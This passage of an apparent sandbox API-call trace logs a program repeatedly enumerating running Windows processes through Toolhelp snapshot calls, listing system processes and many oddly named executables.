[0120.202] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0120.204] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0120.205] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0120.207] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0120.208] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0120.210] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0120.211] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0120.213] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0120.214] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0120.877] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0120.879] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0120.880] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0120.882] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0120.883] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0120.885] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0120.886] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0120.888] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0120.889] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.891] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0120.892] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0120.894] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0120.895] CloseHandle (hObject=0xbc) returned 1 [0120.895] Sleep (dwMilliseconds=0x12c) [0124.481] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0124.487] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0124.488] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0124.489] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0124.490] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0124.490] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0124.491] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0124.492] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0124.493] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0124.494] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0124.494] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0124.495] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.496] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.497] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.498] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.499] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.500] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0124.500] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.501] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.502] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0124.504] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.505] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0124.507] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0124.508] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0124.510] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0124.511] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.797] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0124.798] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0124.799] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0124.800] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0124.801] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0124.802] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0124.803] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0124.805] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0124.806] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0124.807] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0124.809] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0124.810] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0124.811] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0124.812] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0124.813] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0124.814] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0124.816] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0124.817] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0124.818] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0124.819] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0124.820] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0124.821] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.822] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0124.823] CloseHandle (hObject=0xc4) returned 1 [0124.824] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0125.074] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0125.075] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0125.075] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0125.076] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0125.077] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0125.078] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0125.079] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0125.080] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0125.080] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0125.081] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0125.081] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0125.082] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0125.083] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, 